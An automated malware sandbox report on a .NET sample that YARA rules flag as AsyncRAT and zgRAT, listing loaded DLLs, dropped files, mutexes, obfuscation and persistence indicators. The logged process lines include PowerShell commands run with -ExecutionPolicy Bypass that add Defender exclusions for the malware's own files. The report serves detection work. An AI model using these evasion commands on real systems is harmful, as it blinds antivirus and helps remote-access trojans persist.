Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: dump.pcap, type: PCAP Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\btjxg.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 9NBx4Vmiuj.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TypeId.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@16/21@3/3
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe File created: C:\Users\user\AppData\Roaming\AuditRuleType
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\444118017aca01d9d0dde7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\66369895937b82c448aed43e9a0f200e
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Mutant created: \Sessions\1\BaseNamedObjects\i0Yq2Adr82znjD2G
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Temp\btjxg.exe
Source: 9NBx4Vmiuj.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 9NBx4Vmiuj.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe File read: C:\Users\user\Desktop\9NBx4Vmiuj.exe
Source: unknown Process created: C:\Users\user\Desktop\9NBx4Vmiuj.exe "C:\Users\user\Desktop\9NBx4Vmiuj.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\btjxg.exe "C:\Users\user\AppData\Local\Temp\btjxg.exe"
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\btjxg.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 9NBx4Vmiuj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 9NBx4Vmiuj.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: 9NBx4Vmiuj.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: 9NBx4Vmiuj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Pjraflkwkhj.pdb source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184E741000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9781000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937261000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: 9NBx4Vmiuj.exe, Program.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, ListDecorator.cs .Net Code: Read
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
Source: 0.2.9NBx4Vmiuj.exe.2342d191148.11.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
Source: Yara match File source: 2.2.TypeId.exe.2184e8f82a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.TypeId.exe.2184e7e01f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c98201f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.20937378268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.TypeId.exe.2184e858268.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.20937328230.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c98201f8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.209374182a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.20926dfd5f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.TypeId.exe.2184e7e01f8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.TypeId.exe.2184e808230.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c9898268.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c99382a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c9848230.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cfd8230.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.209373001f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.20937328230.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.TypeId.exe.2184e808230.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.1e3c9848230.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.209373001f8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2341c890000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cfd8230.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342d0c82a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342cfb01f8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.TypeId.exe.20926dfd5f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2610110087.0000020937418000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2126079355.000002341C890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2158779274.000002184E8F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2610110087.0000020937300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3409147293.000001E3C9938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3409147293.000001E3C9848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2150448933.000002183E1C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3409147293.000001E3C9898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2158779274.000002184E858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2610110087.0000020937378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2158779274.000002184E7E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2610110087.0000020937328000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2158779274.000002184E808000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3409147293.000001E3C9820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 348, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 7224, type: MEMORYSTR
Source: 9NBx4Vmiuj.exe Static PE information: 0xE589AE2F [Sat Jan 12 19:44:47 2092 UTC]
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C197F push ecx; ret 0_2_00007FF8489C1980
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C09F5 push edx; ret 0_2_00007FF8489C09F6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BE9C3 push ecx; ret 0_2_00007FF8489BE9C4
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BF9C0 push ecx; ret 0_2_00007FF8489BF9C1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C1936 push eax; ret 0_2_00007FF8489C1937
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BF12C push eax; ret 0_2_00007FF8489BF12D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BF974 push ecx; ret 0_2_00007FF8489BF975
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C0A9A push edx; ret 0_2_00007FF8489C0A9B
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B9A82 push ecx; ret 0_2_00007FF8489B9A84
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BFA97 push ecx; ret 0_2_00007FF8489BFA98
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BD294 push ecx; ret 0_2_00007FF8489BD295
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B0848 push ds; retf 5F4Dh 0_2_00007FF8489B5B0F
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BD226 push ecx; ret 0_2_00007FF8489BD227
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C0230 push ecx; ret 0_2_00007FF8489C0231
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C0A58 push edx; ret 0_2_00007FF8489C0A59
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B4A55 push ds; retf 5F4Dh 0_2_00007FF8489B5B0F
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C03B3 push ecx; ret 0_2_00007FF8489C03B4
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BCB96 push ecx; ret 0_2_00007FF8489BCB97
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BE3DB push edx; ret 0_2_00007FF8489BE3DC
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C03F1 push ecx; ret 0_2_00007FF8489C03F2
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B7BF1 push 39D0B948h; ret 0_2_00007FF8489B7BF6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BFB09 push ecx; ret 0_2_00007FF8489BFB0A
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BF35C push ecx; ret 0_2_00007FF8489BF35D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B9B71 push ecx; ret 0_2_00007FF8489B9B72
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BBB69 push ecx; ret 0_2_00007FF8489BBB6A
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489B9B3B push ecx; ret 0_2_00007FF8489B9B3C
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BFCA0 push ecx; ret 0_2_00007FF8489BFCA1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BDCB5 push ecx; ret 0_2_00007FF8489BDCB6
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BDC85 push ecx; ret 0_2_00007FF8489BDC86
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489C047A push ecx; ret 0_2_00007FF8489C047B
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe Code function: 0_2_00007FF8489BF496 push ecx; ret 0_2_00007FF8489BF497
Source: 9NBx4Vmiuj.exe Static PE information: section name: .text entropy: 7.997404824515428
Source: TypeId.exe.0.dr Static PE information: section name: .text entropy: 7.997404824515428

Persistence and Installation Behavior

Source: Yara match File source: 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9NBx4Vmiuj.exe PID: 7060, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: TypeId.exe PID: 1248, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe File created: C:\ProgramData\btjxg.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe File created: C:\Users\user\AppData\Local\Temp\btjxg.exe
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe File created: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe

Boot Survival

Source: Yara match File source: 00000000.00000002.2135818855.00000234355C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
